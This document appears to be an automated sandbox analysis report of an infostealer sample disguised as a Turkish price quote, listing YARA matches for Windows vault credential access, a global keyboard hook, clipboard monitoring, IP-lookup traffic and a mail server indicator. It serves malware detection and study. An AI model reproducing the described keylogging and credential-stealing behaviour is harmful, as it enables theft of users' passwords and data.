Source: Yara match	File source: 9.2.cYDnGbgU.exe.42cdd70.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.cYDnGbgU.exe.4292550.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View	ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View	ASN Name: CNSV-LLCUS CNSV-LLCUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: ip-api.com

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: mail.usgrovemall.com

Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.0000000002871000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.0000000003361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1756426531.00000000042A6000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1756426531.0000000003981000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.0000000002871000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 00000009.00000002.1796054239.0000000004292000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.0000000003361000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4145299206.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.00000000028AE000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.000000000339E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.usgrovemall.com
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4146072478.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4146200410.000000000148A000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4160825037.0000000006D16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4146072478.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4146200410.000000000148A000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4160825037.0000000006D16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1755412576.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.0000000002821000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 00000009.00000002.1794251648.0000000002FDD000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.0000000003311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758054376.0000000004F70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4146072478.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4146200410.000000000148A000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4146200410.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4160825037.0000000006D16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4146072478.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4146200410.000000000148A000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4146200410.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4160825037.0000000006D16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1756426531.00000000042A6000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1756426531.0000000003981000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 00000009.00000002.1796054239.0000000004292000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4145299206.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1756426531.00000000042A6000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1756426531.0000000003981000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.0000000002821000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 00000009.00000002.1796054239.0000000004292000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.0000000003311000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4145299206.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.0000000002821000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.0000000003311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.0000000002821000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.0000000003311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49738 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack, SKTzxzsJw.cs	.Net Code: kHdlDo9V4
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.raw.unpack, SKTzxzsJw.cs	.Net Code: kHdlDo9V4

Installs a global keyboard hook

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\cYDnGbgU.exe

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.cYDnGbgU.exe.4292550.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.cYDnGbgU.exe.42cdd70.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.cYDnGbgU.exe.42cdd70.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.cYDnGbgU.exe.4292550.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 0_2_00A0D2A4	0_2_00A0D2A4
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 0_2_046D5610	0_2_046D5610
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 0_2_06EA4A00	0_2_06EA4A00
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 0_2_06EA34F7	0_2_06EA34F7
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 0_2_06EA3508	0_2_06EA3508
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 0_2_06EAE288	0_2_06EAE288
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 0_2_06EAC0D8	0_2_06EAC0D8
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 0_2_06EABCA0	0_2_06EABCA0
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 0_2_06EA8D28	0_2_06EA8D28
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 0_2_06EA3B08	0_2_06EA3B08
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 0_2_06EA3B03	0_2_06EA3B03
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 0_2_06EAD8C7	0_2_06EAD8C7
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 0_2_06EAD8D8	0_2_06EAD8D8
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 0_2_06EAB868	0_2_06EAB868
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 0_2_06EA49F0	0_2_06EA49F0
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_027DF131	8_2_027DF131
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_027D4AE0	8_2_027D4AE0
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_027DB8A0	8_2_027DB8A0
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_027D3EC8	8_2_027D3EC8
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_027DEC90	8_2_027DEC90
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_027D4210	8_2_027D4210
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_067F1DDC	8_2_067F1DDC
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_067F2AE8	8_2_067F2AE8
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_067F2AC3	8_2_067F2AC3
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_067F37DF	8_2_067F37DF
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_067F1DD0	8_2_067F1DD0
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_0686E458	8_2_0686E458
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_068662B8	8_2_068662B8
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_0686B2E7	8_2_0686B2E7
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_0686C248	8_2_0686C248
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_06865268	8_2_06865268
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_06863130	8_2_06863130
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_06867A40	8_2_06867A40
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_068659AB	8_2_068659AB
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_06862410	8_2_06862410
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_06867360	8_2_06867360
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_06860040	8_2_06860040
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_06860007	8_2_06860007
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 9_2_02DF4870	9_2_02DF4870
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 9_2_02E0D2A4	9_2_02E0D2A4
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_018EB8D8	13_2_018EB8D8
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_018E4AE0	13_2_018E4AE0
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_018EEC90	13_2_018EEC90
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_018E3EC8	13_2_018E3EC8
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_018EF1FF	13_2_018EF1FF
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_018E4210	13_2_018E4210
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_07151DDC	13_2_07151DDC
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_07152AE2	13_2_07152AE2
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_07152AE8	13_2_07152AE8
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_071537DE	13_2_071537DE
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_07151DD0	13_2_07151DD0
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_071CC248	13_2_071CC248
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_071C5268	13_2_071C5268
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_071C62B8	13_2_071C62B8
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_071CB2E7	13_2_071CB2E7
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_071C3130	13_2_071C3130
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_071C7A40	13_2_071C7A40
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_071C59AB	13_2_071C59AB
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_071C2410	13_2_071C2410
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_071CE458	13_2_071CE458
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_071C7360	13_2_071C7360
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_071C0040	13_2_071C0040
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_071C0006	13_2_071C0006

Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1755412576.0000000002641000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs F#U0130YAT TEKL#U0130F#U0130-2400.exe
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000000.1692888651.00000000002BA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBxxR.exe6 vs F#U0130YAT TEKL#U0130F#U0130-2400.exe
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1751802970.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs F#U0130YAT TEKL#U0130F#U0130-2400.exe
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1759141015.00000000072D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs F#U0130YAT TEKL#U0130F#U0130-2400.exe
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758081406.00000000050A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs F#U0130YAT TEKL#U0130F#U0130-2400.exe
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1756426531.0000000003981000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameb4022792-9af8-4cfb-95a6-977ad9d19a8d.exe4 vs F#U0130YAT TEKL#U0130F#U0130-2400.exe
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1756426531.0000000003981000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs F#U0130YAT TEKL#U0130F#U0130-2400.exe
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1755412576.00000000026CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameb4022792-9af8-4cfb-95a6-977ad9d19a8d.exe4 vs F#U0130YAT TEKL#U0130F#U0130-2400.exe
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4145905935.00000000007C8000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs F#U0130YAT TEKL#U0130F#U0130-2400.exe
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe	Binary or memory string: OriginalFilenameBxxR.exe6 vs F#U0130YAT TEKL#U0130F#U0130-2400.exe

Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.2.cYDnGbgU.exe.4292550.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.cYDnGbgU.exe.42cdd70.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.cYDnGbgU.exe.42cdd70.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
